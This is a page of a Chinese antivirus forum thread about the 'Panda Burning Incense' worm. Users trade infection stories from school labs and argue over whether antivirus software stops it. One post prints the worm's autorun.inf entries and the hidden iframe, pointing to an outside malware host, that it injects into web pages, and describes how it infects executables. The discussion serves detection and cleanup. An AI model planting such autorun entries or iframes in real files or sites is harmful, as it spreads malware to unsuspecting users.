瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 再写"熊猫烧香" 希望作者能看到..

«678910111213   10  /  13  页   跳转

再写"熊猫烧香" 希望作者能看到..

哎,,可爱的熊猫,,那天我机子上中熊猫变种,具体是的电脑一启动就禁用声音,你如果一打开声音就自动加载病毒程序,禁用卡卡助手,360安全卫士及所有杀软,禁用msconfig,注册表等结束程序。。汗,,偶是电脑白痴,,看到满城尽烧国宝香,我感觉我要去成都宝光寺当和尚了。。请问病毒作者是成都的吗???带带我,我学会了好去给小日本和美国佬宣传一下中国的文化“国宝香”  我的QQ26813292
gototop
 

快弄个专杀救急啊~~~~
gototop
 

我们单位中了,熊猫的繁殖能力真的这么强的话就不会濒临灭绝了。
杀是杀掉了,可是被破坏的文件恢复不回来,损失惨重...
保留对该病毒作者付诸法律的权力...
gototop
 

杀死假冒的熊猫。

保护国宝。
gototop
 

引用:
【telnet的贴子】回复第69楼水樹雨下:“之前我在drivers目录下写了个文件,防止熊猫病毒文件的写入”网上看来的吧?之前是个放个文件防威金的……
我没有看任何这方面的文章,并不知道网上有你说的这个方法。我指的不是写代码来判断是否为熊猫病毒文件,如果是写代码的话,跟熊猫改名没什么直接联系,杀毒的方法有很多种,防毒的方法你以为就是一种么。
回复第71楼taylor05771:我是学生,是在学校机房玩的,因为时间关系,当时机房要关门了,我没去看防火墙到底怎么样,至于K不K掉我是猜测的,机房的电脑全部都是通过局域网被感染,因为重启电脑,是没有病毒的,我今天还发现局域网有两台主机对我使用的那台电脑进行漏洞攻击,名称我不记得,但我记得有RPC字眼,那些中毒的电脑不光是中熊猫,还中了sxs.exe,反正电脑都中毒了,还不如多玩下。
回复第73楼thull:我是主动运行熊猫的,你说的没错,我运行的那个熊猫是从另外一台电脑拷过来的,而那台电脑的是通过局域网被感染,熊猫自己跑进去的。
这样跟你说,我们学校机房的电脑早段时间装了瑞星杀毒,还正版的呢,照样没用,一样挂掉,他们拿U盘去拷数据,U盘全部感染,后来学校干脆把瑞星卸了,我是拿瑞星到机房去装的,你说主动运行感染,不是通过局域网扩散感染,这点没错啊,可你误解了我的意思,我是试下瑞星对这个熊猫到底有多大的能耐,如果是一般的病毒,我可以把瑞星的文件监控停了,把病毒释放出来,然后开启实时监控,再运行病毒文件,结果不用说,肯定被杀掉了,熊猫就不同了,开启瑞星又能怎么样呢,还不是照样挨K掉。
就算你说定义混淆,早段时间我用的那台电脑没有主动运行熊猫,杀毒一样挂掉,只不过时间问题罢了,有杀毒软件又怎么样呢,机子被感染了,杀毒程序还不是一样死掉。其他的我就不说了,我只是谈谈17号就是昨天的实际情况,并没有刻意说什么,我昨天玩熊猫主要有两个目的:一、看看现在的杀毒软件对熊猫烧香能有什么样的反应。二、看看熊猫除了在drivers目录下生成spoclsv.exe之外(假如spoclsv.exe文件名被禁止写入)还会不会变成另外的文件名把自己写到这个目录下。
………………

杀毒软件对病毒的识别有滞后性 这可能是个杀软的弊病
但是你的说法有漏洞 我的瑞星开启监控 u盘在同学的机器上(中熊猫的)那回来
在ie里面输入u盘地址 进入后瑞星直接将病毒主文件干掉(setup.exe)我电脑是显示所有文件的
u盘内有一新建文件夹 里面有hijackthis等工具 不想也被熊猫感染了 我双击文件夹 瑞星报毒 并将熊猫挨个清除 还原了原来的exe文件 
我想说明一点 即使不运行那个文件瑞星都可以报毒 那么你说的有杀软也挂掉就有牵强了
我想问下你的瑞星是什么时候的 
那天我给网警样本 没关监控还原到桌面的新建文件夹里 压缩时瑞星直接报毒 
把监控关了后 再还原再压缩 压缩后瑞星一样可以正常开启 并无你说的那种情况

另外,我记得有个人说过 病毒也是一种程序 也需要运行才能生效 我不知道这种看法正确与否 但是 我从未看过一个exe文件放在桌面过一段时间自己运行了 大部分都是利用漏洞和双击(也包括伪造右键菜单的)等误操作中了感染的 如果你要是有样本放在硬盘上(机器没有别的毒) 什么操作也不执行 过几天这病毒自己开始从零运行感染了机器的话 请传给我下 呵呵
我也是学生 学校的机房情况和你的差不多 大部分都是因为u盘感染的 而一般人习惯双击打开 即使用右键也会可能被伪造的菜单迷惑 这两关过去了 u盘里有可执行的被感染过的文件 以为高枕无忧了 一运行 又感染了  用范伟大哥的话:防不胜防啊
所以 机房的基本是通过这种方式或者局域网共享漏洞造成的
学校的机房——————管理一般比较散漫 很少有人每天把杀软升级到最新(即使是正版) 开了自动升级也不能保证时时刻刻都是新的 这样 新的熊猫一旦是杀软识别不了的
一运行自然把杀软干掉 你说装了也没用 未免太武断了吧??? 
保证杀软是新的(能识别) 你不用运行熊猫 熊猫都能被干掉 如果按你的那种说法 天下所有的杀软都没办法 还不如裸奔呢

顺便问你句:你以为装了个杀软就万事大吉 防火墙是可有可无的?????????
gototop
 

干脆直接做系统算了!!!
gototop
 

引用:
【要你的吻的贴子】干脆直接做系统算了!!!
………………

所有根目录及移动存储生成
X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe


感染时..病毒会跳过文件名为 setup.exe 和 ntdetect.com 的文件..并删除gho文件..

感染的 .exe/.scr/.pif/.com/ 文件在 头部添加:30,001 字节(病毒主体) 尾部添加:29 字节(标记信息)

感染的 .htm/.html/.asp/.php/.jsp/.aspx 网页文件 在尾部加入
</html><iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>

在访问过的目录下生成 desktop_.ini 文件..
斑竹的帖子得看内完整啊
gototop
 

引用:
第93楼thull:没关监控还原到桌面的新建文件夹里 压缩时瑞星直接报毒

直接从瑞星病毒隔离区里面还原的文件很多是不报警的,对文件点击右键,指针经过,引起触发事件(只是触发,并不是激活),只要瑞星能够识别的病毒,肯定报警。
引用:
把监控关了后  再还原再压缩  压缩后瑞星一样可以正常开启  并无你说的那种情况

你把熊猫放出来不运行它,等上个两三个小时看看,会出现什么情况,再说,你把熊猫打包压起来,跟没有病毒文件有什么两样,我没见过给病毒压缩后不解压出来就可以使用的,到底你是运行解压程序还是病毒程序?这个要弄清楚。
我们学校机房的电脑(除了放毒的主机外),重启后是没有病毒的(装有还原卡),其他的我不说,我用的那台我有没有运行被感染的程序我清楚,但是一个小时这样还不是中招?你说的是没错,瑞星一样可以正常开启,我用的那台也装有啊,开始和你的一样可以开启,到了后来就不行了,这只不过是时间问题罢了。
引用:
我想说明一点 即使不运行那个文件瑞星都可以报毒

说明你的瑞星可以识别。
引用:
我想问下你的瑞星是什么时候的

我装的是V19.05的,虽然版本低了点,但是机房就是那么几个熊猫,有人说那个gamesetup.exe是最原始的病毒,那么也就是还没变种的对吧,这么说来,瑞星对于这个原始病毒来说应该是最新杀毒程序,但就是没反应,我那天还用了最新的江民移动版去扫描都没反应,你们不要小看移动版的,它的病毒库跟官方的病毒库查杀数据没什么两样,只不过没有实时监控,杀毒助手什么的而已,杀毒功能不会比安装版的江民差,移动版的江民还可以杀出我电脑里面瑞星最新版本所不能够检测的病毒。
引用:
如果按你的那种说法 天下所有的杀软都没办法 还不如裸奔呢

现在病毒这么多,传播的方式也不同,如果只是有熊猫病毒这么一种,可能我不会装杀毒软件,瑞星更不用提了,到时候挨K掉,伤心。既然病毒多,安装杀毒软件还是可以预防很多病毒的。
引用:
顺便问你句:你以为装了个杀软就万事大吉 防火墙是可有可无的?????????

我不会把系统完全交给任何杀毒软件,因为我不相信它们,假如我学的不是计算机专业,我会跟许多人一样,有了杀毒软件就完全信任了,然后就是高枕无忧,我也不会关注任何什么病毒、杀毒的,同时我也不会在这里发表什么个人看法。
 
gototop
 

回telnet:
既然你说是个时间的问题 那么这个时间是多少呢?
顺便发一下我的假设:
要是熊猫有时钟的话 那么它自己发作 这样的话它的时钟要么是倒计时  需要运行程序
要么调用系统时间 也应该是运行了才能
一个“安装文件” 不运行的话怎么有时间呢?没有时间 怎么样定自己的爆发时间呢
好象我听说过的病毒一般都是先中 到一特定的时间执行特定的事情
所以好象中过了才能有时间这个概念么
我不知道一个熊猫的setup.exe直接放到硬盘上 不对其进行任何操作
到底多长时间它开始感染呢?
PS:我不是学计算机的 对编程更是一窍不通 对病毒 更是门外汉 大家轻点拍我
   

而且我发现你每次回复别人的帖子都能将焦点引向别的方向 而并非是帖子原本要表达的观点 这方法参加辩论到是不错
你说的是没错,瑞星一样可以正常开启,我用的那台也装有啊,开始和你的一样可以开启,到了后来就不行了,这只不过是时间问题罢了。
呵呵 还有 我问你的防火墙问题呢  你只说了杀软 你能肯定你机器上的毒不是通过局域网漏洞感染的
还原卡?我们学校的也是还原卡 蓝光卡 但是要留个分区供储存 不是还原的 你学校机房的机器该不是所有盘一起还原的吧?
gototop
 

引用:
【黑哥001的贴子】



你试过吗?
………………

我装网警的防火墙规则就没中毒
gototop
 
«678910111213   10  /  13  页   跳转
页面顶部
Powered by Discuz!NT